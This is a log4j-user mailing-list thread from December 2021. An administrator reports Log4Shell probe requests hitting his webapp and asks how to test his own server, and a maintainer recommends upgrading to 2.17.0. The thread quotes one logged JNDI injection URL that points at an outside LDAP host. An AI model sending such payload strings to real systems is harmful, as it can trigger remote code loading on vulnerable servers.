Hi Gary

In the case of one webapp I was able to upgrade quickly to 2.17.0 and everything seems to be fine :-)

Thanks for the hint, searching for "log4j shell poc" helps, so let's see whether we can attack ourselves :-)

Thanks

Michael

Am 18.12.21 um 14:36 schrieb Gary Gregory:
Michael,

First, please make sure you are using our latest and greatest, currently 2.17.0.
https://logging.apache.org/log4j/2.x/download.html

I don't want to spread the FUD here, but if you search the web for
"Log4Shell", you should find POCs.

TY!
Gary

On Sat, Dec 18, 2021 at 7:57 AM Michael Wechner
<michael.wech...@wyona.com> wrote:
Hi

I have a webapp running using log4j and I can see various requests
containing jndi, e.g.

http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D

whereas it is not clear to me whether the attack was successful.

Does anyone know how I could attack my own server in order to test
whether my server might be vulnerable?

Thanks

Michael

---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org

---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org



---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org

Reply via email to